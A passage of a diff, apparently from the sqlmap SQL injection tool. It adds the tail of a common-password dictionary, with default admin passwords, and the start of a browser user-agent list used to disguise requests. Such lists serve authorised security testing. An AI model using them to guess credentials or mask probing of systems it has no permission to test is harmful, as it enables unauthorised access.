+salou25 +salut +salvador +salvation +samantha +samantha1 +sambo +samiam +samko +sammakko +sammie +sammy +sammy1 +sammy123 +samoht +sample +SAMPLE +Sample123 +sampson +samsam +samson +samsung +samsung1 +samsung123 +samuel +samuel22 +samuli +samurai +sanane +sanane123 +sananelan +sanchez +sand +sandeep +sander +sandhya +sandi +sandman +sandoval +sandra +sandrock +sandstorm +sandwich +sandy +sanfran +sanguine +sanjay +sanjose +sanpedro +santa +santana +santiago +santos +santosh +santtu +sanyika +saopaulo +SAP +sap123 +sapphire +sarah +sarah1 +sarasara +sarita +sascha +sasha +sasha123 +sasquatch +sassy +sassy1 +sasuke +satan666 +satelite +satellite +satisfaction +satori +satriani +saturday +saturn +saturn5 +saulite +saulute +saulyte +saunders +sausage +savage +savanna +savannah +sawyer +saxon +saxophone +sayang +sayangkamu +sayonara +scarface +scarlet +scarlett +schalke +schatzi +schedule +scheisse +scheme +schiller +schnapps +schneider +schnitzel +school +school1 +schooner +schroeder +schule +schumacher +schuster +schwartz +science +scirocco +scissors +scofield +scooby +scooby1 +scoobydo +scoobydoo +scooter +scooter1 +scooters +score +scorpio +scorpio1 +scorpion +scorpions +scotch +scotland +scott +scott1 +scottie +scottish +scotty +scout +scouting +scramble +scranton +scrapper +scrappy +scream +screamer +screen +screw +screwy +scribble +scrooge +scruffy +scuba1 +scully +seabee +seadoo +seagate +seagull +seahawks +seahorse +searay +search +searcher +searching +seashell +seashore +seattle +sebastian +sebastian1 +sebring +second +secret +secret1 +secret123 +secret3 +secret666 +secrets +secure +security +SECURITY +seduction +seinfeld +select +selector +selena +selina +seminoles +semper +semperfi +senators +seneca +seng +senha123 +senior +seniseviyorum +senna +senorita +sensation +sensei +sensitive +sensor +SENTINEL +seoul +septembe +september +septiembre +sequence +serdar +serega +serena +serenade +serendipity +serenity +sergei +sergey +sergio +series +serkan +servando +server +service +services +sessions +sestosant +settlers +setup +seven +seven7 +sevens +seventeen +sex +sex123 +sex4me +sexman +sexo +sexsex +sexual +sexx +sexxx +sexxxx +sexxy +sexy +sexy1 +sexy12 +sexy123 +sexy69 +sexybabe +sexybitch +sexyboy +sexygirl +sexylady +sexymama +sexyman +sexyme +sf49ers +sh +shadow +shadow1 +shadow12 +shaggy +shakespeare +shakira +shalimar +shalom +shampoo +shamrock +shan +shane +shania +shannon +shannon1 +shanti +shaolin +share +shark +sharma +sharon +sharpshooter +shasha +shaved +shearer +sheeba +sheena +sheep +sheffield +sheila +shekinah +shelby +sheldon +shelly +shelter +shemale +shen +sheng +sherbert +sheriff +sherlock +sherman +sherry +shevchenko +shi123456 +shibby +shilpa +shiner +shinichi +shinobi +ship +shipping +shirley +shirley1 +shit +shitface +shithead +shitshit +shitty +shivers +shock +shocker +shocking +shodan +shoelace +shopping +short +shortcake +shortcut +shorty +shorty1 +shoshana +shotgun +shotokan +shoulder +shovel +show +showboat +showcase +showme +showtime +shredder +shrimp +shuang +shun +shuriken +shutdown +shutup +shyshy +sideshow +sideways +sidney +siemens +sierra +Sierra +sifra +sifre +siga14 +sigma +sigmachi +signa +signal +sigrun +siilike +sikais +silence +silencio +silicone +silmaril +silver +silver1 +silverado +silverfish +silvia +simmons +simon +simona +simone +simonka +simonko +simple +simpleplan +simpson +simpsons +simran +sims +simulator +sinbad +sindre +sindri +sinegra +sinfonia +singapor +singer +single +sinister +sinned +sinner +sisma +sissy +sister +sister12 +sisters +sitakott +sitapea +site +sitecom +sixers +sixpack +sixpence +sixty +skate +skateboard +skateboarding +skater +skater1 +skeeter +skeleton +skibum +skidoo +skillet +skinhead +skinny +skipjack +skipper +skippy +skittles +skuggi +skydiver +skyhawk +skylar +skyline +skywalker +slacker +slammer +slapper +slappy +slapshot +slaptazodis +slater +slaughter +slave +slayer +sleeper +sleeping +sleepy +slick +slick1 +slider +slideshow +slimshady +slipknot +slipknot1 +slipknot666 +slniecko +sloppy +slovenia +slowpoke +sluggo +slut +sluts +slutty +sma +smackdown +small +smallville +smart1 +smartass +smartbox +smcadmin +smeghead +smegma +smelly +smile +smile1 +smiles +smiley +smith +smithers +smiths +smitty +smoke +smoke420 +smoker +smokey +smokey1 +smoking +smooch +smooth +smoothie +smother +smudge +smuggler +snakebite +snakeeater +snapper +snapple +snapshot +snatch +sneakers +sneaky +snickers +snickers1 +sniper +snoop +snoopdog +snoopdogg +snoopy +snoopy1 +snotra +snowball +snowbird +snowboar +snowfall +snowflak +snowflake +snowhite +snowman +snowman1 +snowshoe +snowski +snowwhite +snuffles +snuggles +soap +sober1 +sobriety +soccer +soccer1 +soccer10 +soccer11 +soccer12 +soccer13 +soccer2 +soccer22 +socrates +sofia +softball +softball1 +software +Sojdlg123aljg +sokrates +soldiers +soledad +soleil +solitaire +solitude +solla +solo +solomon +solstice +solutions +sombrero +some +somebody +someone +somethin +something +sometime +somewhere +sommar +sondra +song +songbird +sonics +sonrisa +sony +sony1 +sonya +sonyvaio +sooner +sophia +sophie +sorensen +soto +soul +soulmate +southpark +southside +southside1 +southwest +souvenir +sovereign +sowhat +soyhermosa +space +spaceman +spagetti +spaghetti +spain +spalding +spanker +spanking +spankme +spanky +spanner +sparhawk +sparkle +sparkles +sparky +Sparky +sparky1 +sparrows +sparta +spartan1 +spartan117 +spazz +speaker +speakers +special +special1 +specialist +specialk +spectral +spectre +spectrum +speeding +speedo +speedster +speedy +speles +spelling +spence +spencer +spencer1 +sperma +sphinx +sphynx +spice +spider +spider1 +spiderma +spiderman +spiderman1 +spidey +spike +spike1 +spikes +spikey +spirit +spiritual +spit +spitfire +splash +spock +spoiled +spongebo +spongebob +spongebob1 +spooge +spooky +spoon +sporting +sports +spotlight +spring +springs +sprinkle +sprite +spud +spunky +spurs +spyder +sql +sqlexec +square +squash +squeaker +squirrel +squirt +srinivas +sriram +sss +ssss +ssssss +sssssss +ssssssss +ssssssssss +stacey +staci +stacy +stainless +stairway +stalingrad +stalker +stamford +stampede +stan +standard +stanley +stanley1 +staples +star +star69 +starbuck +starbucks +starchild +starcraft +stardust +starfish +stargate +stargazer +starless +starlight +starling +starr +stars +starshine +starship +start +start1 +starter +startfinding +starting +startrek +starwars +starwars1 +state +Status +stayout +stealth +steaua +steele +steelers +steelers1 +steelman +stefan +stefania +stefanie +stefanos +stelios +stella +stellar +steph +steph1 +stephani +stephanie +stephanie1 +stephen +stephens +stephi +stereo +sterling +sternchen +steve +steven +steven1 +stevens +stewart +stick +stickman +sticky +stiletto +stimpy +sting1 +stingray +stinker +stinky +stitches +stock +stockman +stockton +stoffer +stolen +stone +stonecold +stonehenge +stoneman +stoner +stones +stories +storm +straight +strange +stranger +strat +strategy +stratus +strawber +strawberry +stream +streamer +streaming +street +streets +strider +strike +strikers +string +stripper +stroker +stronger +stronghold +struggle +strummer +struzhka +stryker +stuart +stubby +student +student1 +student2 +students +studioworks +studman +stunner +stuntman +stupid +stupid1 +sturgeon +style +styles +sublime +submarine +submit +subwoofer +subzero +success +successful +succubus +sucesso +sucked +sucker +suckers +sucking +suckit +suckme +suckmydick +sucks +sudoku +sue +sugarplum +suicidal +suicide +suitcase +sukses +sullivan +summer +summer00 +summer01 +summer05 +summer1 +summer12 +summers +summit +summoner +sunbird +sundance +sunday +sundevil +sunfire +sunflowe +sunflower +sunflowers +sunita +suniukas +sunna +sunny123 +sunnyboy +sunnyday +sunrise +sunset +sunshine +sunshine1 +suomi +super +super123 +superbowl +superboy +supercool +superdog +superduper +supergirl +superhero +superior +superman +superman1 +supermand +supermen +supernova +superpass +superpower +supersecret +supersonic +superstage +superstar +superuser +supervisor +support +supra +surabaya +surecom +surf +surfboard +surfer +surfing +surprise +surrender +surround +survival +survivor +susana +sushi +susie +suslik +suzanne +suzuki +suzy +sveinn +sverige +svetlana +swanson +sweden +sweet +sweet1 +sweet123 +sweet16 +sweetest +sweetheart +sweetie +sweetiepie +sweetnes +sweetness +sweetpea +sweets +sweetwater +sweety +swim +swimming +swingers +swinging +switzer +swoosh +sword +swordfis +swordfish +sydney +sylvania +sylvester +sylvia +sylwia +symbol +symmetry +sympa +symphony +syndrome +synergy +syracuse +sys +sysadm +syspass +system +system5 +syzygy +szabolcs +szerelem +szeretlek +sziszi +tabatha +taco +tacobell +tacoma +tactical +taffy +tagged +tajmahal +takahiro +takanori +takataka +takayuki +takedown +takoyaki +talented +talks +tallinn +tallulah +talon +tamara +tami +tamtam +tania +tanker +tanner +tantra +tanya1 +tanzania +tapestry +tappancs +tappara +tara +tarantino +taratara +tardis +targas +target +target123 +tarheel +tarpon +tarragon +tartar +tarzan +tasha1 +tassen +tatiana +tattoo +taurus +taxman +taylor +taylor1 +taytay +tazdevil +tazman +tazmania +tbird +t-bone +teacher +teacher1 +teaching +team +teamo +teamomucho +teamwork +teardrop +tech +technical +technics +techno +techsupport +tectec +teddy +teddybea +teddybear +teenage +teenager +teens +teflon +teiubesc +tekiero +tekila +tekken +Telechargement +telecom +telefon +telefonas +telefono +telefoon +telemark +telephone +televizija +telos +telus00 +temp +temp! +temp123 +tempest +templar +template +temporal +temporary +temppass +temptation +temptemp +tender +tenerife +teng +tennesse +tennessee +tennis +tennyson +tequiero +tequieromucho +tequila +tere123 +teresa +teretere +terminal +terminat +terminator +terminus +terrapin +terrell +terriers +terrific +terror +terrorist +terserah +test +test! +test1 +test12 +test123 +test1234 +test2 +test3 +testament +teste123 +tester +testi +testicle +testing +testpass +testpilot +testtest +test_user +tetsuo +texas +thaddeus +thai123 +thailand +thankyou +the +thebeach +thebear +thebeast +thebest +thebest1 +thecat +thecrow +thecure +thedon +thedoors +thedude +theforce +thegame +their +thejudge +thekid +theking +thelma +theman +thematrix +themis +theodora +theodore +there +theresa +therock +these +thesims +thethe +thething +thetruth +thiago +thing +thinking +thinkpad +thirteen +this +thisisit +thomas +thomas01 +thomas1 +thomas123 +thompson +thong +thongs +thornton +thousand +threesome +thriller +throat +thuglife +thumbs +thumper +thunder +thunder1 +thunderbolt +thunders +thursday +thurston +thx1138 +tian +tibco +tiburon +ticket +tickle +ticktock +tierno +tietokone +tiffany +tiffany1 +tiger +tiger1 +tiger123 +tigereye +tigerman +tigers +tigerwoods +tigger +tigger1 +tigger12 +tight +tightend +tights +tigre +tigris +tiiger +tika +tikitiki +timberlake +time +timelord +timely +timeout +timosha +timosha123 +timothy +timtim +tinker +tinkerbe +tinkerbell +tinkle +tinman +tintin +Tiny +tiramisu +tissemand +titanic +titanium +titimaman +titkos +titouf59 +tits +titten +titty +tivoli +tmnet123 +tnt +tobias +toby +today +toejam +together +toggle +toilet +tokiohotel +tokyo +tomas123 +tomasko +tomato +tombstone +tomcat +tomek1 +tomika +tomislav1 +tommaso +tommy +tommy123 +tomohiro +tomotomo +tomtom +tomukas +tong +tonight +tony +tonytony +toolbox +toomas +toon +toor +toothpaste +toothpick +tootsie +topcat +topdog +topgun +tophat +topnotch +topolino +topsecret +torcida +toreador +toriamos +torino +tormentor +tornado +tornado1 +toronto +toronto1 +torpedo +torrance +torrents +torres +tortilla +tortoise +toshiba +total +toti +toto1 +tototo +tottenham +toucan +touchdown +touching +tower +town +townsend +toxic +toxicity +toyota +trace +tracer +traci +track +tracker +tractor +tracy +trader +traffic +trails +train +trainer +trampoline +trance +tranquil +transfer +transform +transformer +transformers +transit +trash +trashcan +trashman +trauma +travel +traveler +traveller +travis +tre +treble +tree +treefrog +trees +treetop +treetree +trespass +trevor +trial +triathlon +tribunal +tricia +trickster +trigger +trinidad +trinitro +trinity +trip +triple +tripleh +triplets +tripod +tripper +tripping +trish +trisha +tristan +tristan1 +triton +triumph +trivial +trixie +trojan +trojans +troll +trombone +trooper +troopers +trophy +trouble +trout +troy +truck +truelove +truffles +trujillo +trumpet +trunks +trunte +trustme +trustno1 +trustnoone +truth +tryagain +tsunami +tttttt +tuan +tucker +tucson +tudelft +tuesday +tula +tuna +tunafish +tundra +tunnussana +tuomas +tupac +tuppence +turbine +turbo +turbo2 +turkey +turner +turnip +turquoise +turtle +tutor +tuttle +tweety +tweety1 +tweetybird +twelve +twenty +twilight +twinkie +twinkle +twinkles +twins +twisted +twister +twitter +tybnoq +tycoon +tyler +tyler1 +typewriter +typhoon +tyrone +tyson +tyson1 +U38fa39 +uboot +ultima +ultimate +ultra +ultrasound +umbrella +umesh +umpire +unbreakable +undead +underdog +understand +undertaker +undertow +underwater +underworld +unforgiven +unhappy +unicorn +unicornio +unicorns +unique +united +unity +universal +universe +universidad +university +unix +unknown +unleashed +unlocked +unreal +untitled +untouchable +uploader +upsilon +uptown +upyours +uQA9Ebw445 +urchin +ursula +usa123 +user +user0 +user1 +user1234 +user2 +user3 +user4 +user5 +user6 +user7 +user8 +user888 +username +usmarine +usmc +Usuckballz1 +utility +utopia +uuuuuuuu +vacation +vaffanculo +vagabond +vagina +val +valami +valdemar +valencia +valentin +valentina +valentinchoque +valentine +valeria +valerian +valerie +valeverga +valhalla +validate +valtteri +vampire +vampire1 +vampires +vanderbilt +vanesa +vanessa +vanessa1 +vanhalen +vanilla +vanquish +variable +vasant +vasara +vaseline +vector +vedder +vedran +vegas +vegeta +vegetable +velo +velocity +vengeance +venkat +venom +ventura +venus +vera55 +veracruz +verbatim +vergessen +veritas +verizon +vermilion +verona +veronica +veronika +veronique +vertical +verygood +vette +vfhbyf +vfrcbv +vh5150 +viagra +vickie +victor +victoria +victoria1 +victory +video +vietnam +viewsoni +vijaya +viking +vikings +vikings1 +viktor +viktoria +viktorija +vincent +vineyard +vinicius +vinkovci +vinnie +violator +violence +violet +violetta +violette +violin +viper +vipergts +vipers +virgilio +virgin +virginia +virtual +virus +VIRUSER +visa +viscount +vishal +vision +vision2 +visitor +visitors +visor +visual +vittoria +vittorio +vivian +viviana +vivien +vivienne +vkontakte +vladimir +VOizGwrC +volcano +volcom +volimte +volkswag +volley +volleyba +volleyball +voltaire +volume +volunteer +volvo +voodoo +voyager +voyeur +VQsaBLPzLa +vsegda +vulcan +vvvv +vvvvvvvv +waffle +waiting +wakefield +walden +walker +wallace +wall.e +walrus +walter +wanderlust +wang +wangyut2 +wanker +wanted +warcraft +wareagle +warehouse +warez +wargames +warhamme +warhammer +warlock +warning +warranty +warren +warrior +warrior1 +warriors +warszawa +wasabi +washington +wasser +wassup +wasted +watanabe +watch +watchdog +watching +watchman +watchmen +water +water123 +waterfall +waterman +watermelon +waterpolo +waters +watson +wayne +weasel +weather +weaver +web +webcal01 +weblogic +webmaste +webmaster +webster +wedding +wedge +wednesday +weed420 +weenie +weezer +welcome +welcome1 +welcome123 +welder +wellington +wendi +wendy +wendy1 +weng +werder +werdna +werewolf +wert +wertwert +wertz123 +wesley +westcoast +western +westgate +westlife +weston +westside +westwind +wetpussy +wg +wh +whale1 +what +whatever +whatever1 +whatnot +whatsup +whatthe +whatwhat +whiplash +whiskey +whisky +whisper +whit +white +whiteboy +whiteman +whiteout +whiting +whitney +whittier +whocares +whoknows +wholesale +whynot +wichmann +wicked +wickedwitch +widzew +wiesenhof +wifey +wiktoria +wild +wildbill +wildcat +wildcats +wildfire +wildflower +wildlife +wildman +wildone +wildrose +will +william +william1 +williams +willie +willis +willow +Willow +wilson +wind +window +windows +windows1 +windowsxp +windsurf +windward +winger +wingnut +wings +winner +winner1 +winnie +Winnie +winnipeg +winona +winston +winter +winthrop +wisconsin +wisdom +wiseguy +wishbone +witchcraft +wizard +wizard1 +wizards +woaini +woaini1314 +wojtek +wolf +wolf1 +wolfen +wolfgang +wolfhound +wolfie +wolfpac +wolfpack +wolverin +wolverine +wolverines +wolves +woman +wombat +women +wonder +wonderful +wood +woodbury +woodchuck +woodie +woodland +woodlawn +woodruff +woodside +woodstoc +woodwind +woody +woofer +woowoo +word +wordpass +wordup +work +work123 +working +workout +world +wormhole +worship +worthy +wow12345 +wowwow +wraith +wrangler +wrench +wrestle +wrestler +wrestlin +wrestling +wrinkle1 +writer +writing +wsh +www +wwww +wwwwww +wwwwwww +wwwwwwww +xanadu +xanth +xavier +xbox360 +xceladmin +xcountry +x-files +xiang +xiao +ximena +ximenita +xing +xiong +XRGfmSx +xtr +xuan +xxx +xxx123 +xxxx +xxxxx +xxxxxx +xxxxxxx +xxxxxxxx +xxxxxxxxxx +xyz +xyzzy +y +YAgjecc826 +yahoo +yahoo123 +yamaha +yamahar1 +yamamoto +yang +yankee +yankees +yankees1 +yankees2 +yardbird +yasmin +yasuhiro +yaya +yeah +yellow +yellow1 +yellow12 +yes +yeshua +yessir +yesterday +yesyes +yfnfif +ying +yingyang +yolanda +yomama +yong +yorktown +yosemite +yoteamo +youbye123 +young +young1 +yourmom +yourmom1 +yourname +yourself +yoyo +yoyoma +yoyoyo +ysrmma +YtQ9bkR +ytrewq +yuan +yuantuo2012 +yukiyuki +yukon +yummy +yvonne +yxcvbnm +yyyy +yyyyyyyy +yzerman +z123456 +z1x2c3v4 +za123456 +zacefron +zachary +zachary1 +zadzad +zag12wsx +zagreb +zalgiris +zander +zang +zanzibar +zapato +zaphod +zaq12wsx +zaq1zaq1 +zaqxsw +zaragoza +zebra +zebras +zeng +zenith +zeppelin +zepplin +zerocool +zerozero +zeus +zhang +zhao +zheng +zhong +zhongguo +zhou +zhuang +zhuo +zidane +ziggy +zildjian +zimbabwe +zing +ziomek +zipper +zippo +zirtaeb +zk.: +zmodem +zolika +zoltan +zombie +zong +zoomer +zoosk +zuikis +zuzana +ZVjmHgC355 +zwerg +zxc +zxc123 +zxcasdqwe +zxccxz +zxcv +zxcv1234 +zxcvb +zxcvbn +zxcvbnm +Zxcvbnm +zxcvbnm1 +zxcvbnm123 +zxcxz +zxczxc +zxzxzx +zzzxxx +zzzzz +zzzzzz +zzzzzzzz +zzzzzzzzzz diff --git a/data/txt/user-agents.txt b/data/txt/user-agents.txt new file mode 100644 index 00000000000..31bca9529d3 --- /dev/null +++ b/data/txt/user-agents.txt @@ -0,0 +1,190 @@ +# Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +# See the file 'LICENSE' for copying permission + +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:109.0) Gecko/20100101 Firefox/115.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.7 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.33 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Edg/139.0.0.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.155 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/139 Version/11.1.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) EdgiOS/139 Version/16.0 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/18.6 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.13 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.14 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.7 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.2 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 Ddg/18.6 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 